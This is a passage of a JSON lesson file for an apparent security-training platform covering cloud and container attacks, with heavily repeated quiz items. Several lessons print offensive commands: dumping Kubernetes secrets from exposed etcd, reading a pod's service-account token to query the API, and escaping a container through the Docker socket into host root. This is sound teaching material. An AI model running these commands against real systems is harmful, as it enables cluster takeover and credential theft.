container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-azure-storage","cat":"Cloud & Container","title":"Azure Storage Security","diff":2,"xp":150,"intro":"Find and access misconfigured Azure blob storage.","sections":[{"type":"text","content":"Find and access misconfigured Azure blob storage."},{"type":"code","lang":"bash","content":"curl https://target.blob.core.windows.net/container?restype=container&comp=list\naz storage blob list --container-name public --account-name target"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Azure blob public access allows...","opts":["Admin access","Anyone to list and download stored files","SSH access","Database access"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-azure-func","cat":"Cloud & Container","title":"Azure Functions Exploitation","diff":3,"xp":200,"intro":"Exploit Azure serverless functions.","sections":[{"type":"text","content":"Exploit Azure serverless functions."},{"type":"code","lang":"bash","content":"az functionapp list\naz functionapp function list --name app --resource-group rg\n# Check for function keys (authentication)\naz functionapp function keys list --name app -g rg --function-name func"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Azure Functions authenticate with...","opts":["OAuth only","Function keys and host keys","Certificates only","Username/password"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-gcp-iam","cat":"Cloud & Container","title":"GCP IAM Enumeration","diff":2,"xp":150,"intro":"Discover GCP users, service accounts, and permissions.","sections":[{"type":"text","content":"Discover GCP users, service accounts, and permissions."},{"type":"code","lang":"bash","content":"gcloud iam service-accounts list\ngcloud projects get-iam-policy PROJECT_ID\ngcloud iam roles list"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"GCP IAM differs from AWS by...","opts":["Being simpler","Using resource-based policies at the project/folder/org level","Being harder","Using groups only"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-k8s-etcd","cat":"Cloud & Container","title":"etcd Security in Kubernetes","diff":4,"xp":250,"intro":"Protect the K8s brain \u2014 or exploit it.","sections":[{"type":"text","content":"Protect the K8s brain \u2014 or exploit it."},{"type":"code","lang":"bash","content":"# Check if etcd is exposed\nnmap -p 2379 target\netcdctl --endpoints=http://target:2379 get / --prefix --keys-only\n# Dump all secrets from etcd\netcdctl get / --prefix | grep -A1 /registry/secrets"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"etcd stores...","opts":["Container images","All K8s cluster state including secrets","Network policies only","Pod logs only"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-k8s-sa","cat":"Cloud & Container","title":"K8s Service Account Exploitation","diff":3,"xp":200,"intro":"Exploit default service account tokens.","sections":[{"type":"text","content":"Exploit default service account tokens."},{"type":"code","lang":"bash","content":"# Every pod gets a service account token\ncat /var/run/secrets/kubernetes.io/serviceaccount/token\n# Use it to access K8s API\ncurl -k -H \"Authorization: Bearer $(cat token)\" https://kubernetes/api/v1/namespaces"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Default service accounts often have...","opts":["No permissions","More permissions than needed","Admin access","Network access"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-k8s-ingress","cat":"Cloud & Container","title":"K8s Ingress Security","diff":2,"xp":150,"intro":"Secure external access to cluster services.","sections":[{"type":"text","content":"Secure external access to cluster services."},{"type":"code","lang":"bash","content":"kubectl get ingress -A\n# Check for: missing TLS, wildcard hosts, path traversal\n# Annotations can expose admin panels\nkubectl get ingress -A -o yaml | grep -i annotation"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"K8s Ingress handles...","opts":["Internal traffic","External HTTP/HTTPS traffic routing to services","Pod scheduling","Storage"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-helm","cat":"Cloud & Container","title":"Helm Chart Security","diff":3,"xp":200,"intro":"Audit Helm charts for security issues.","sections":[{"type":"text","content":"Audit Helm charts for security issues."},{"type":"code","lang":"bash","content":"# Check values.yaml for dangerous settings\ngrep -r 'privileged: true' chart/\ngrep -r 'hostPath' chart/\ngrep -r 'hostNetwork' chart/\n# Scan with checkov\ncheckov -d chart/"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Malicious Helm charts can...","opts":["Only affect the namespace","Compromise the entire cluster with privileged pods","Nothing dangerous","Only read data"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-docker-escape","cat":"Cloud & Container","title":"Docker Socket Escape","diff":3,"xp":200,"intro":"Escape containers through the Docker socket.","sections":[{"type":"text","content":"Escape containers through the Docker socket."},{"type":"code","lang":"bash","content":"ls -la /var/run/docker.sock  # if accessible:\ndocker run -v /:/host --rm -it alpine chroot /host bash"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Docker socket in a container means...","opts":["Read-only access","Full host root access","Network monitoring","Container cloning"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container 